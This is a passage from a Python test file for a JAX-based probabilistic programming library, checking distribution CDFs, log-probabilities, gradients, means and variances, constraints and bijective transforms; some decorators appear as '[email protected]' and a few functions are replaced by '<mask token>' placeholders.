dist.StudentT) else 1e-05\n if d.shape() == () and not d.is_discrete:\n assert_allclose(jax.vmap(jax.grad(d.cdf))(samples), jnp.exp(d.\n log_prob(samples)), atol=1e-05, rtol=rtol)\n assert_allclose(jax.vmap(jax.grad(d.icdf))(quantiles), jnp.exp(\n -d.log_prob(d.icdf(quantiles))), atol=1e-05, rtol=rtol)\n assert_allclose(d.cdf(d.icdf(quantiles)), quantiles, atol=1e-05,\n rtol=1e-05)\n assert_allclose(d.icdf(d.cdf(samples)), samples, atol=1e-05, rtol=rtol)\n except NotImplementedError:\n pass\n if not sp_dist:\n pytest.skip('no corresponding scipy distn.')\n sp_dist = sp_dist(*params)\n try:\n actual_cdf = d.cdf(samples)\n expected_cdf = sp_dist.cdf(samples)\n assert_allclose(actual_cdf, expected_cdf, atol=1e-05, rtol=1e-05)\n actual_icdf = d.icdf(quantiles)\n expected_icdf = sp_dist.ppf(quantiles)\n assert_allclose(actual_icdf, expected_icdf, atol=0.0001, rtol=0.0001)\n except NotImplementedError:\n pass\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DIRECTIONAL)\ndef test_gof(jax_dist, sp_dist, params):\n if 'Improper' in jax_dist.__name__:\n pytest.skip('distribution has improper .log_prob()')\n if 'LKJ' in jax_dist.__name__:\n pytest.xfail('incorrect submanifold scaling')\n if jax_dist is dist.EulerMaruyama:\n d = jax_dist(*params)\n if d.event_dim > 1:\n pytest.skip(\n 'EulerMaruyama skip test when event shape is non-trivial.')\n num_samples = 10000\n if 
'BetaProportion' in jax_dist.__name__:\n num_samples = 20000\n rng_key = random.PRNGKey(0)\n d = jax_dist(*params)\n samples = d.sample(key=rng_key, sample_shape=(num_samples,))\n probs = np.exp(d.log_prob(samples))\n dim = None\n if jax_dist is dist.ProjectedNormal:\n dim = samples.shape[-1] - 1\n probs = probs.reshape(num_samples, -1)\n samples = samples.reshape(probs.shape + d.event_shape)\n if 'Dirichlet' in jax_dist.__name__:\n samples = samples[..., :-1]\n for b in range(probs.shape[1]):\n try:\n gof = auto_goodness_of_fit(samples[:, b], probs[:, b], dim=dim)\n except InvalidTest:\n pytest.skip('expensive test')\n else:\n assert gof > TEST_FAILURE_RATE\n\n\n<mask token>\n\n\ndef _tril_cholesky_to_tril_corr(x):\n w = vec_to_tril_matrix(x, diagonal=-1)\n diag = jnp.sqrt(1 - jnp.sum(w ** 2, axis=-1))\n cholesky = w + jnp.expand_dims(diag, axis=-1) * jnp.identity(w.shape[-1])\n corr = jnp.matmul(cholesky, cholesky.T)\n return matrix_to_tril_vec(corr, diagonal=-1)\n\n\[email protected]('dimension', [2, 3, 5])\ndef test_log_prob_LKJCholesky_uniform(dimension):\n d = dist.LKJCholesky(dimension=dimension, concentration=1)\n N = 5\n corr_log_prob = []\n for i in range(N):\n sample = d.sample(random.PRNGKey(i))\n log_prob = d.log_prob(sample)\n sample_tril = matrix_to_tril_vec(sample, diagonal=-1)\n cholesky_to_corr_jac = np.linalg.slogdet(jax.jacobian(\n _tril_cholesky_to_tril_corr)(sample_tril))[1]\n corr_log_prob.append(log_prob - cholesky_to_corr_jac)\n corr_log_prob = np.array(corr_log_prob)\n assert_allclose(corr_log_prob, jnp.broadcast_to(corr_log_prob[0],\n corr_log_prob.shape), rtol=1e-06)\n if dimension == 2:\n assert_allclose(corr_log_prob[0], jnp.log(0.5), rtol=1e-06)\n\n\[email protected]('dimension', [2, 3, 5])\[email protected]('concentration', [0.6, 2.2])\ndef test_log_prob_LKJCholesky(dimension, concentration):\n d = dist.LKJCholesky(dimension, concentration, sample_method='cvine')\n beta_sample = d._beta.sample(random.PRNGKey(0))\n beta_log_prob = jnp.sum(d._beta.log_prob(beta_sample))\n partial_correlation = 2 * beta_sample - 1\n affine_logdet = beta_sample.shape[-1] * jnp.log(2)\n sample = signed_stick_breaking_tril(partial_correlation)\n inv_tanh = lambda t: jnp.log((1 + t) / (1 - t)) / 2\n inv_tanh_logdet = jnp.sum(jnp.log(vmap(grad(inv_tanh))(\n partial_correlation)))\n unconstrained = inv_tanh(partial_correlation)\n corr_cholesky_logdet = biject_to(constraints.corr_cholesky\n ).log_abs_det_jacobian(unconstrained, sample)\n signed_stick_breaking_logdet = corr_cholesky_logdet + inv_tanh_logdet\n actual_log_prob = d.log_prob(sample)\n expected_log_prob = (beta_log_prob - affine_logdet -\n signed_stick_breaking_logdet)\n assert_allclose(actual_log_prob, expected_log_prob, rtol=2e-05)\n assert_allclose(jax.jit(d.log_prob)(sample), d.log_prob(sample), atol=2e-06\n )\n\n\ndef test_zero_inflated_logits_probs_agree():\n concentration = np.exp(np.random.normal(1))\n rate = np.exp(np.random.normal(1))\n d = dist.GammaPoisson(concentration, rate)\n gate_logits = np.random.normal(0)\n gate_probs = expit(gate_logits)\n zi_logits = dist.ZeroInflatedDistribution(d, gate_logits=gate_logits)\n zi_probs = dist.ZeroInflatedDistribution(d, gate=gate_probs)\n sample = np.random.randint(0, 20, (1000, 100))\n assert_allclose(zi_probs.log_prob(sample), zi_logits.log_prob(sample))\n\n\n<mask token>\n\n\[email protected]('total_count', [1, 2, 3, 10])\[email protected]('shape', [(1,), (3, 1), (2, 3, 1)])\ndef test_beta_binomial_log_prob(total_count, shape):\n concentration0 = 
np.exp(np.random.normal(size=shape))\n concentration1 = np.exp(np.random.normal(size=shape))\n value = jnp.arange(1 + total_count)\n num_samples = 100000\n probs = np.random.beta(concentration1, concentration0, size=(\n num_samples,) + shape)\n log_probs = dist.Binomial(total_count, probs).log_prob(value)\n expected = logsumexp(log_probs, 0) - jnp.log(num_samples)\n actual = dist.BetaBinomial(concentration1, concentration0, total_count\n ).log_prob(value)\n assert_allclose(actual, expected, rtol=0.02)\n\n\[email protected]('total_count', [1, 2, 3, 10])\[email protected]('batch_shape', [(1,), (3, 1), (2, 3, 1)])\ndef test_dirichlet_multinomial_log_prob(total_count, batch_shape):\n event_shape = 3,\n concentration = np.exp(np.random.normal(size=batch_shape + event_shape))\n value = total_count * jnp.eye(event_shape[-1]).reshape(event_shape + (1\n ,) * len(batch_shape) + event_shape)\n num_samples = 100000\n probs = dist.Dirichlet(concentration).sample(random.PRNGKey(0), (\n num_samples, 1))\n log_probs = dist.Multinomial(total_count, probs).log_prob(value)\n expected = logsumexp(log_probs, 0) - jnp.log(num_samples)\n actual = dist.DirichletMultinomial(concentration, total_count).log_prob(\n value)\n assert_allclose(actual, expected, rtol=0.05)\n\n\[email protected]('shape', [(1,), (3, 1), (2, 3, 1)])\ndef test_gamma_poisson_log_prob(shape):\n gamma_conc = np.exp(np.random.normal(size=shape))\n gamma_rate = np.exp(np.random.normal(size=shape))\n value = jnp.arange(15)\n num_samples = 300000\n poisson_rate = np.random.gamma(gamma_conc, 1 / gamma_rate, size=(\n num_samples,) + shape)\n log_probs = dist.Poisson(poisson_rate).log_prob(value)\n expected = logsumexp(log_probs, 0) - jnp.log(num_samples)\n actual = dist.GammaPoisson(gamma_conc, gamma_rate).log_prob(value)\n assert_allclose(actual, expected, rtol=0.05)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_log_prob_gradient(jax_dist, sp_dist, params):\n if jax_dist in [dist.LKJ, dist.LKJCholesky]:\n pytest.skip('we have separated tests for LKJCholesky distribution')\n if jax_dist is _ImproperWrapper:\n pytest.skip(\n 'no param for ImproperUniform to test for log_prob gradient')\n rng_key = random.PRNGKey(0)\n value = jax_dist(*params).sample(rng_key)\n\n def fn(*args):\n return jnp.sum(jax_dist(*args).log_prob(value))\n eps = 0.001\n for i in range(len(params)):\n if jax_dist is dist.EulerMaruyama and i == 1:\n continue\n if jax_dist is _SparseCAR and i == 3:\n continue\n if isinstance(params[i], dist.Distribution):\n continue\n if params[i] is None or jnp.result_type(params[i]) in (jnp.int32,\n jnp.int64):\n continue\n actual_grad = jax.grad(fn, i)(*params)\n args_lhs = [(p if j != i else p - eps) for j, p in enumerate(params)]\n args_rhs = [(p if j != i else p + eps) for j, p in enumerate(params)]\n fn_lhs = fn(*args_lhs)\n fn_rhs = fn(*args_rhs)\n expected_grad = (fn_rhs - fn_lhs) / (2.0 * eps)\n assert jnp.shape(actual_grad) == jnp.shape(params[i])\n if i == 0 and jax_dist is dist.Delta:\n expected_grad = 0.0\n assert_allclose(jnp.sum(actual_grad), expected_grad, rtol=0.01,\n atol=0.01)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_mean_var(jax_dist, sp_dist, params):\n if jax_dist is _ImproperWrapper:\n pytest.skip('Improper distribution does not has mean/var implemented')\n if jax_dist is FoldedNormal:\n pytest.skip('Folded distribution does not has mean/var implemented')\n if jax_dist is dist.EulerMaruyama:\n pytest.skip(\n 
'EulerMaruyama distribution does not has mean/var implemented')\n if jax_dist is dist.RelaxedBernoulliLogits:\n pytest.skip(\n 'RelaxedBernoulli distribution does not has mean/var implemented')\n if 'SineSkewed' in jax_dist.__name__:\n pytest.skip('Skewed Distribution are not symmetric about location.')\n if jax_dist in (_TruncatedNormal, _TruncatedCauchy, dist.\n LeftTruncatedDistribution, dist.RightTruncatedDistribution, dist.\n TwoSidedTruncatedDistribution):\n pytest.skip('Truncated distributions do not has mean/var implemented')\n if jax_dist is dist.ProjectedNormal:\n pytest.skip('Mean is defined in submanifold')\n n = 20000 if jax_dist in [dist.LKJ, dist.LKJCholesky, dist.\n SineBivariateVonMises] else 200000\n d_jax = jax_dist(*params)\n k = random.PRNGKey(0)\n samples = d_jax.sample(k, sample_shape=(n,)).astype(np.float32)\n if sp_dist and not _is_batched_multivariate(d_jax) and jax_dist not in [\n dist.VonMises, dist.MultivariateStudentT, dist.MatrixNormal]:\n d_sp = sp_dist(*params)\n try:\n sp_mean = d_sp.mean()\n except TypeError:\n sp_mean = d_sp.mean\n if d_jax.event_shape:\n try:\n sp_var = jnp.diag(d_sp.cov())\n except TypeError:\n sp_var = jnp.diag(d_sp.cov)\n except AttributeError:\n sp_var = d_sp.var()\n else:\n sp_var = d_sp.var()\n assert_allclose(d_jax.mean, sp_mean, rtol=0.01, atol=1e-07)\n assert_allclose(d_jax.variance, sp_var, rtol=0.01, atol=1e-07)\n if jnp.all(jnp.isfinite(sp_mean)):\n assert_allclose(jnp.mean(samples, 0), d_jax.mean, rtol=0.05,\n atol=0.01)\n if jnp.all(jnp.isfinite(sp_var)):\n assert_allclose(jnp.std(samples, 0), jnp.sqrt(d_jax.variance),\n rtol=0.05, atol=0.01)\n elif jax_dist in [dist.LKJ, dist.LKJCholesky]:\n if jax_dist is dist.LKJCholesky:\n corr_samples = jnp.matmul(samples, jnp.swapaxes(samples, -2, -1))\n else:\n corr_samples = samples\n dimension, concentration, _ = params\n marginal = dist.Beta(concentration + 0.5 * (dimension - 2), \n concentration + 0.5 * (dimension - 2))\n marginal_mean = 2 * marginal.mean - 1\n marginal_std = 2 * jnp.sqrt(marginal.variance)\n expected_mean = jnp.broadcast_to(jnp.reshape(marginal_mean, jnp.\n shape(marginal_mean) + (1, 1)), jnp.shape(marginal_mean) +\n d_jax.event_shape)\n expected_std = jnp.broadcast_to(jnp.reshape(marginal_std, jnp.shape\n (marginal_std) + (1, 1)), jnp.shape(marginal_std) + d_jax.\n event_shape)\n expected_mean = expected_mean * (1 - jnp.identity(dimension)\n ) + jnp.identity(dimension)\n expected_std = expected_std * (1 - jnp.identity(dimension))\n assert_allclose(jnp.mean(corr_samples, axis=0), expected_mean, atol\n =0.01)\n assert_allclose(jnp.std(corr_samples, axis=0), expected_std, atol=0.01)\n elif jax_dist in [dist.VonMises]:\n assert_allclose(d_jax.mean, jnp.mean(samples, 0), rtol=0.05, atol=0.01)\n x, y = jnp.mean(jnp.cos(samples), 0), jnp.mean(jnp.sin(samples), 0)\n expected_variance = 1 - jnp.sqrt(x ** 2 + y ** 2)\n assert_allclose(d_jax.variance, expected_variance, rtol=0.05, atol=0.01\n )\n elif jax_dist in [dist.SineBivariateVonMises]:\n phi_loc = _circ_mean(samples[..., 0])\n psi_loc = _circ_mean(samples[..., 1])\n assert_allclose(d_jax.mean, jnp.stack((phi_loc, psi_loc), axis=-1),\n rtol=0.05, atol=0.01)\n elif jax_dist in [dist.MatrixNormal]:\n sample_shape = 200000,\n if len(d_jax.batch_shape) > 0:\n axes = [(len(sample_shape) + i) for i in range(len(d_jax.\n batch_shape))]\n axes = tuple(axes)\n samples_re = jnp.moveaxis(samples, axes, jnp.arange(len(axes)))\n subshape = samples_re.shape[:len(axes)]\n ixi = product(*[range(k) for k in subshape])\n for ix in 
ixi:\n\n def get_min_shape(ix, batch_shape):\n return min(ix, tuple(map(lambda x: x - 1, batch_shape)))\n ix_loc = get_min_shape(ix, d_jax.loc.shape[:len(ix)])\n jnp.allclose(jnp.mean(samples_re[ix], 0), jnp.squeeze(d_jax\n .mean[ix_loc]), rtol=0.5, atol=0.01)\n samples_mvn = jnp.squeeze(samples_re[ix]).reshape(\n sample_shape + (-1,), order='F')\n ix_col = get_min_shape(ix, d_jax.scale_tril_column.shape[:\n len(ix)])\n ix_row = get_min_shape(ix, d_jax.scale_tril_row.shape[:len(ix)]\n )\n scale_tril = my_kron(d_jax.scale_tril_column[ix_col], d_jax\n .scale_tril_row[ix_row])\n sample_scale_tril = jnp.linalg.cholesky(jnp.cov(samples_mvn.T))\n jnp.allclose(sample_scale_tril, scale_tril, atol=0.5, rtol=0.01\n )\n else:\n jnp.allclose(jnp.mean(samples, 0), jnp.squeeze(d_jax.mean),\n rtol=0.5, atol=0.01)\n samples_mvn = jnp.squeeze(samples).reshape(sample_shape + (-1,),\n order='F')\n scale_tril = my_kron(jnp.squeeze(d_jax.scale_tril_column), jnp.\n squeeze(d_jax.scale_tril_row))\n sample_scale_tril = jnp.linalg.cholesky(jnp.cov(samples_mvn.T))\n jnp.allclose(sample_scale_tril, scale_tril, atol=0.5, rtol=0.01)\n else:\n if jnp.all(jnp.isfinite(d_jax.mean)):\n assert_allclose(jnp.mean(samples, 0), d_jax.mean, rtol=0.05,\n atol=0.01)\n if isinstance(d_jax, dist.CAR):\n pytest.skip(\n 'CAR distribution does not have `variance` implemented.')\n if isinstance(d_jax, dist.Gompertz):\n pytest.skip(\n 'Gompertz distribution does not have `variance` implemented.')\n if jnp.all(jnp.isfinite(d_jax.variance)):\n assert_allclose(jnp.std(samples, 0), jnp.sqrt(d_jax.variance),\n rtol=0.05, atol=0.01)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\[email protected]('prepend_shape', [(), (2,), (2, 3)])\ndef test_distribution_constraints(jax_dist, sp_dist, params, prepend_shape):\n if jax_dist in (_TruncatedNormal, _TruncatedCauchy, _GaussianMixture,\n _Gaussian2DMixture, _GeneralMixture, _General2DMixture):\n pytest.skip(f'{jax_dist.__name__} is a function, not a class')\n dist_args = [p for p in inspect.getfullargspec(jax_dist.__init__)[0][1:]]\n valid_params, oob_params = list(params), list(params)\n key = random.PRNGKey(1)\n dependent_constraint = False\n for i in range(len(params)):\n if jax_dist in (_ImproperWrapper, dist.LKJ, dist.LKJCholesky\n ) and dist_args[i] != 'concentration':\n continue\n if 'SineSkewed' in jax_dist.__name__ and dist_args[i] != 'skewness':\n continue\n if jax_dist is dist.EulerMaruyama and dist_args[i] != 't':\n continue\n if jax_dist is dist.TwoSidedTruncatedDistribution and dist_args[i\n ] == 'base_dist':\n continue\n if jax_dist is dist.GaussianRandomWalk and dist_args[i] == 'num_steps':\n continue\n if jax_dist is dist.SineBivariateVonMises and dist_args[i\n ] == 'weighted_correlation':\n continue\n if params[i] is None:\n oob_params[i] = None\n valid_params[i] = None\n continue\n constraint = jax_dist.arg_constraints[dist_args[i]]\n if isinstance(constraint, constraints._Dependent):\n dependent_constraint = True\n break\n key, key_gen = random.split(key)\n oob_params[i] = gen_values_outside_bounds(constraint, jnp.shape(\n params[i]), key_gen)\n valid_params[i] = gen_values_within_bounds(constraint, jnp.shape(\n params[i]), key_gen)\n if jax_dist is dist.MultivariateStudentT:\n valid_params[0] += 1\n if jax_dist is dist.LogUniform:\n valid_params[1] += valid_params[0]\n assert jax_dist(*oob_params)\n if not dependent_constraint and (jax_dist is not _ImproperWrapper and \n 'SineSkewed' not in jax_dist.__name__):\n with 
pytest.raises(ValueError):\n jax_dist(*oob_params, validate_args=True)\n with pytest.raises(ValueError):\n oob_params = jax.device_get(oob_params)\n\n def dist_gen_fn():\n d = jax_dist(*oob_params, validate_args=True)\n return d\n jax.jit(dist_gen_fn)()\n d = jax_dist(*valid_params, validate_args=True)\n if sp_dist and not _is_batched_multivariate(d) and not (d.event_shape and\n prepend_shape):\n valid_samples = gen_values_within_bounds(d.support, size=\n prepend_shape + d.batch_shape + d.event_shape)\n try:\n expected = sp_dist(*valid_params).logpdf(valid_samples)\n except AttributeError:\n expected = sp_dist(*valid_params).logpmf(valid_samples)\n assert_allclose(d.log_prob(valid_samples), expected, atol=1e-05,\n rtol=1e-05)\n oob_samples = gen_values_outside_bounds(d.support, size=prepend_shape +\n d.batch_shape + d.event_shape)\n with pytest.warns(UserWarning, match='Out-of-support'):\n d.log_prob(oob_samples)\n with pytest.warns(UserWarning, match='Out-of-support'):\n oob_samples = jax.device_get(oob_samples)\n valid_params = jax.device_get(valid_params)\n\n def log_prob_fn():\n d = jax_dist(*valid_params, validate_args=True)\n return d.log_prob(oob_samples)\n jax.jit(log_prob_fn)()\n\n\ndef test_omnistaging_invalid_param():\n\n def f(x):\n return dist.LogNormal(x, -np.ones(2), validate_args=True).log_prob(0)\n with pytest.raises(ValueError, match='got invalid'):\n jax.jit(f)(0)\n\n\ndef test_omnistaging_invalid_sample():\n\n def f(x):\n return dist.LogNormal(x, np.ones(2), validate_args=True).log_prob(-1)\n with pytest.warns(UserWarning, match='Out-of-support'):\n jax.jit(f)(0)\n\n\ndef test_categorical_log_prob_grad():\n data = jnp.repeat(jnp.arange(3), 10)\n\n def f(x):\n return dist.Categorical(jax.nn.softmax(x * jnp.arange(1, 4))).log_prob(\n data).sum()\n\n def g(x):\n return dist.Categorical(logits=x * jnp.arange(1, 4)).log_prob(data\n ).sum()\n x = 0.5\n fx, grad_fx = jax.value_and_grad(f)(x)\n gx, grad_gx = jax.value_and_grad(g)(x)\n assert_allclose(fx, gx, rtol=1e-06)\n assert_allclose(grad_fx, grad_gx, atol=0.0001)\n\n\ndef test_beta_proportion_invalid_mean():\n with dist.distribution.validation_enabled(), pytest.raises(ValueError,\n match='^BetaProportion distribution got invalid mean parameter\\\\.$'):\n dist.BetaProportion(1.0, 1.0)\n\n\[email protected]('constraint, x, expected', [(constraints.boolean,\n np.array([True, False]), np.array([True, True])), (constraints.boolean,\n np.array([1, 1]), np.array([True, True])), (constraints.boolean, np.\n array([-1, 1]), np.array([False, True])), (constraints.corr_cholesky,\n np.array([[[1, 0], [0, 1]], [[1, 0.1], [0, 1]]]), np.array([True, False\n ])), (constraints.corr_cholesky, np.array([[[1, 0], [1, 0]], [[1, 0], [\n 0.5, 0.5]]]), np.array([False, False])), (constraints.corr_matrix, np.\n array([[[1, 0], [0, 1]], [[1, 0.1], [0, 1]]]), np.array([True, False])),\n (constraints.corr_matrix, np.array([[[1, 0], [1, 0]], [[1, 0], [0.5, \n 0.5]]]), np.array([False, False])), (constraints.greater_than(1), 3, \n True), (constraints.greater_than(1), np.array([-1, 1, 5]), np.array([\n False, False, True])), (constraints.integer_interval(-3, 5), 0, True),\n (constraints.integer_interval(-3, 5), np.array([-5, -3, 0, 1.1, 5, 7]),\n np.array([False, True, True, False, True, False])), (constraints.\n interval(-3, 5), 0, True), (constraints.interval(-3, 5), np.array([-5, \n -3, 0, 5, 7]), np.array([False, True, True, True, False])), (\n constraints.less_than(1), -2, True), (constraints.less_than(1), np.\n array([-1, 1, 5]), np.array([True, 
False, False])), (constraints.\n lower_cholesky, np.array([[1.0, 0.0], [-2.0, 0.1]]), True), (\n constraints.lower_cholesky, np.array([[[1.0, 0.0], [-2.0, -0.1]], [[1.0,\n 0.1], [2.0, 0.2]]]), np.array([False, False])), (constraints.\n nonnegative_integer, 3, True), (constraints.nonnegative_integer, np.\n array([-1.0, 0.0, 5.0]), np.array([False, True, True])), (constraints.\n positive, 3, True), (constraints.positive, np.array([-1, 0, 5]), np.\n array([False, False, True])), (constraints.positive_definite, np.array(\n [[1.0, 0.3], [0.3, 1.0]]), True), (constraints.positive_definite, np.\n array([[[2.0, 0.4], [0.3, 2.0]], [[1.0, 0.1], [0.1, 0.0]]]), np.array([\n False, False])), (constraints.positive_integer, 3, True), (constraints.\n positive_integer, np.array([-1.0, 0.0, 5.0]), np.array([False, False, \n True])), (constraints.real, -1, True), (constraints.real, np.array([np.\n inf, -np.inf, np.nan, np.pi]), np.array([False, False, False, True])),\n (constraints.simplex, np.array([0.1, 0.3, 0.6]), True), (constraints.\n simplex, np.array([[0.1, 0.3, 0.6], [-0.1, 0.6, 0.5], [0.1, 0.6, 0.5]]),\n np.array([True, False, False])), (constraints.softplus_positive, 3, \n True), (constraints.softplus_positive, np.array([-1, 0, 5]), np.array([\n False, False, True])), (constraints.softplus_lower_cholesky, np.array([\n [1.0, 0.0], [-2.0, 0.1]]), True), (constraints.softplus_lower_cholesky,\n np.array([[[1.0, 0.0], [-2.0, -0.1]], [[1.0, 0.1], [2.0, 0.2]]]), np.\n array([False, False])), (constraints.unit_interval, 0.1, True), (\n constraints.unit_interval, np.array([-5, 0, 0.5, 1, 7]), np.array([\n False, True, True, True, False])), (constraints.sphere, np.array([[1, 0,\n 0], [0.5, 0.5, 0]]), np.array([True, False])), (constraints.\n open_interval(0.0, 1.0), np.array([-5, 0, 0.5, 1, 7]), np.array([False,\n False, True, False, False]))])\ndef test_constraints(constraint, x, expected):\n v = constraint.feasible_like(x)\n if jnp.result_type(v) == 'float32' or jnp.result_type(v) == 'float64':\n assert not constraint.is_discrete\n assert_array_equal(constraint(x), expected)\n feasible_value = constraint.feasible_like(x)\n assert jnp.shape(feasible_value) == jnp.shape(x)\n assert_allclose(constraint(feasible_value), jnp.full(jnp.shape(expected\n ), True))\n try:\n inverse = biject_to(constraint).inv(feasible_value)\n except NotImplementedError:\n pass\n else:\n assert_allclose(inverse, jnp.zeros_like(inverse), atol=2e-07)\n\n\[email protected]('constraint', [constraints.corr_cholesky,\n constraints.corr_matrix, constraints.greater_than(2), constraints.\n interval(-3, 5), constraints.l1_ball, constraints.less_than(1),\n constraints.lower_cholesky, constraints.scaled_unit_lower_cholesky,\n constraints.ordered_vector, constraints.positive, constraints.\n positive_definite, constraints.positive_ordered_vector, constraints.\n real, constraints.real_vector, constraints.simplex, constraints.\n softplus_positive, constraints.softplus_lower_cholesky, constraints.\n unit_interval, constraints.open_interval(0.0, 1.0)], ids=lambda x: x.\n __class__)\[email protected]('shape', [(), (1,), (3,), (6,), (3, 1), (1, 3), (5,\n 3)])\ndef test_biject_to(constraint, shape):\n transform = biject_to(constraint)\n event_dim = transform.domain.event_dim\n if isinstance(constraint, constraints._Interval):\n assert transform.codomain.upper_bound == constraint.upper_bound\n assert transform.codomain.lower_bound == constraint.lower_bound\n elif isinstance(constraint, constraints._GreaterThan):\n assert transform.codomain.lower_bound == 
constraint.lower_bound\n elif isinstance(constraint, constraints._LessThan):\n assert transform.codomain.upper_bound == constraint.upper_bound\n if len(shape) < event_dim:\n return\n rng_key = random.PRNGKey(0)\n x = random.normal(rng_key, shape)\n y = transform(x)\n assert transform.forward_shape(x.shape) == y.shape\n assert transform.inverse_shape(y.shape) == x.shape\n x_nan = transform.inv(jnp.full(jnp.shape(y), np.nan))\n assert x_nan.shape == x.shape\n batch_shape = shape if event_dim == 0 else shape[:-1]\n assert_array_equal(transform.codomain(y), jnp.ones(batch_shape, dtype=\n jnp.bool_))\n z = transform.inv(y)\n assert_allclose(x, z, atol=1e-05, rtol=1e-05)\n assert_array_equal(transform.domain(z), jnp.ones(batch_shape))\n actual = transform.log_abs_det_jacobian(x, y)\n assert jnp.shape(actual) == batch_shape\n if len(shape) == event_dim:\n if constraint is constraints.simplex:\n expected = np.linalg.slogdet(jax.jacobian(transform)(x)[:-1, :])[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y)\n [:, :-1])[1]\n elif constraint in [constraints.real_vector, constraints.\n ordered_vector, constraints.positive_ordered_vector,\n constraints.l1_ball]:\n expected = np.linalg.slogdet(jax.jacobian(transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y))[1]\n elif constraint in [constraints.corr_cholesky, constraints.corr_matrix\n ]:\n vec_transform = lambda x: matrix_to_tril_vec(transform(x),\n diagonal=-1)\n y_tril = matrix_to_tril_vec(y, diagonal=-1)\n\n def inv_vec_transform(y):\n matrix = vec_to_tril_matrix(y, diagonal=-1)\n if constraint is constraints.corr_matrix:\n matrix = matrix + jnp.swapaxes(matrix, -2, -1\n ) + jnp.identity(matrix.shape[-1])\n return transform.inv(matrix)\n expected = np.linalg.slogdet(jax.jacobian(vec_transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(inv_vec_transform\n )(y_tril))[1]\n elif constraint in [constraints.lower_cholesky, constraints.\n scaled_unit_lower_cholesky, constraints.positive_definite,\n constraints.softplus_lower_cholesky]:\n vec_transform = lambda x: matrix_to_tril_vec(transform(x))\n y_tril = matrix_to_tril_vec(y)\n\n def inv_vec_transform(y):\n matrix = vec_to_tril_matrix(y)\n if constraint is constraints.positive_definite:\n matrix = matrix + jnp.swapaxes(matrix, -2, -1) - jnp.diag(\n jnp.diag(matrix))\n return transform.inv(matrix)\n expected = np.linalg.slogdet(jax.jacobian(vec_transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(inv_vec_transform\n )(y_tril))[1]\n else:\n expected = jnp.log(jnp.abs(grad(transform)(x)))\n inv_expected = jnp.log(jnp.abs(grad(transform.inv)(y)))\n assert_allclose(actual, expected, atol=1e-05, rtol=1e-05)\n assert_allclose(actual, -inv_expected, atol=1e-05, rtol=1e-05)\n\n\[email protected]('transform, event_shape', [(PermuteTransform(np.\n array([3, 0, 4, 1, 2])), (5,)), (PowerTransform(2.0), ()), (\n SoftplusTransform(), ()), (LowerCholeskyAffine(np.array([1.0, 2.0]), np\n .array([[0.6, 0.0], [1.5, 0.4]])), (2,)), (transforms.ComposeTransform(\n [biject_to(constraints.simplex), SimplexToOrderedTransform(0.0),\n biject_to(constraints.ordered_vector).inv]), (5,))])\[email protected]('batch_shape', [(), (1,), (3,), (6,), (3, 1), (1, \n 3), (5, 3)])\ndef test_bijective_transforms(transform, event_shape, batch_shape):\n shape = batch_shape + event_shape\n rng_key = random.PRNGKey(0)\n x = biject_to(transform.domain)(random.normal(rng_key, shape))\n y = transform(x)\n assert_array_equal(transform.codomain(y), jnp.ones(batch_shape))\n z 
= transform.inv(y)\n assert_allclose(x, z, atol=1e-06, rtol=0.0001)\n assert transform.inv.inv is transform\n assert transform.inv is transform.inv\n assert transform.domain is transform.inv.codomain\n assert transform.codomain is transform.inv.domain\n assert_array_equal(transform.domain(z), jnp.ones(batch_shape))\n actual = transform.log_abs_det_jacobian(x, y)\n assert_allclose(actual, -transform.inv.log_abs_det_jacobian(y, x))\n assert jnp.shape(actual) == batch_shape\n if len(shape) == transform.domain.event_dim:\n if len(event_shape) == 1:\n expected = np.linalg.slogdet(jax.jacobian(transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y))[1]\n else:\n expected = jnp.log(jnp.abs(grad(transform)(x)))\n inv_expected = jnp.log(jnp.abs(grad(transform.inv)(y)))\n assert_allclose(actual, expected, atol=1e-06)\n assert_allclose(actual, -inv_expected, atol=1e-06)\n\n\[email protected]('batch_shape', [(), (5,)])\ndef test_composed_transform(batch_shape):\n t1 = transforms.AffineTransform(0, 2)\n t2 = transforms.LowerCholeskyTransform()\n t = transforms.ComposeTransform([t1, t2, t1])\n assert t.domain.event_dim == 1\n assert t.codomain.event_dim == 2\n x = np.random.normal(size=batch_shape + (6,))\n y = t(x)\n log_det = t.log_abs_det_jacobian(x, y)\n assert log_det.shape == batch_shape\n expected_log_det = jnp.log(2) * 6 + t2.log_abs_det_jacobian(x * 2, y / 2\n ) + jnp.log(2) * 9\n assert_allclose(log_det, expected_log_det)\n\n\[email protected]('batch_shape', [(), (5,)])\ndef test_composed_transform_1(batch_shape):\n t1 = transforms.AffineTransform(0, 2)\n t2 = transforms.LowerCholeskyTransform()\n t = transforms.ComposeTransform([t1, t2, t2])\n assert t.domain.event_dim == 1\n assert t.codomain.event_dim == 3\n x = np.random.normal(size=batch_shape + (6,))\n y = t(x)\n log_det = t.log_abs_det_jacobian(x, y)\n assert log_det.shape == batch_shape\n z = t2(x * 2)\n expected_log_det = jnp.log(2) * 6 + t2.log_abs_det_jacobian(x * 2, z\n ) + t2.log_abs_det_jacobian(z, t2(z)).sum(-1)\n assert_allclose(log_det, expected_log_det)\n\n\[email protected]('batch_shape', [(), (5,)])\ndef test_simplex_to_order_transform(batch_shape):\n simplex = jnp.arange(5.0) / jnp.arange(5.0).sum()\n simplex = jnp.broadcast_to(simplex, batch_shape + simplex.shape)\n transform = SimplexToOrderedTransform()\n out = transform(simplex)\n assert out.shape == transform.forward_shape(simplex.shape)\n assert simplex.shape == transform.inverse_shape(out.shape)\n\n\[email protected]('batch_shape', [(), (5,)])\[email protected]('prepend_event_shape', [(), (4,)])\[email protected]('sample_shape', [(), (7,)])\ndef test_transformed_distribution(batch_shape, prepend_event_shape,\n sample_shape):\n base_dist = dist.Normal(0, 1).expand(batch_shape + prepend_event_shape +\n (6,)).to_event(1 + len(prepend_event_shape))\n t1 = transforms.AffineTransform(0, 2)\n t2 = 